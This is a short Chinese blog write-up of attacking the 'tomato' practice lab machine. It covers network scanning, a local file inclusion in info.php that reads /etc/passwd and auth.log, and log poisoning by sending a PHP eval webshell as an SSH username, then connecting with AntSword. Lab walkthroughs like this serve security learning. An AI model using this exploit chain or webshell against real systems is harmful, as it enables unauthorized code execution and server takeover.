tomato靶场打靶过程

  信息收集

  • 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l
  • 得到目标靶机的IP为:192.168.248.133
  • 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-10000 192.168.248.133,发现开放了 21、80、2211、8888 四个端口

漏洞发现

  • 访问 http://192.168.248.133/antibot_image/antibots/info.php,找到 phpinfo 的信息,F12查看源码发现 hint,存在文件包含漏洞

漏洞利用

http://192.168.248.133/antibot_image/antibots/info.php?image=/etc/passwd

前面信息搜集时发现开放了 2211 端口,服务为 ssh,尝试对日志文件写入 shell,然后包含日志文件

先查看日志文件是不是在默认路径:http://192.168.248.133/antibot_image/antibots/info.php?image=/var/log/auth.log

  • 利用 ssh 连接,写入一句话木马:ssh '<?php @eval($_POST[111])?>'@192.168.248.133 -p2211,蚁剑连接
  • 之所以用CentOS连接是因为kali2024bug导致ssh连接报错
  • 蚁剑连接的目录是/var/log/auth.log
  • 总结

  • 本次打靶利用的是文件包含漏洞包含日志GetShell,通过写入错误登录信息连接shell

  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值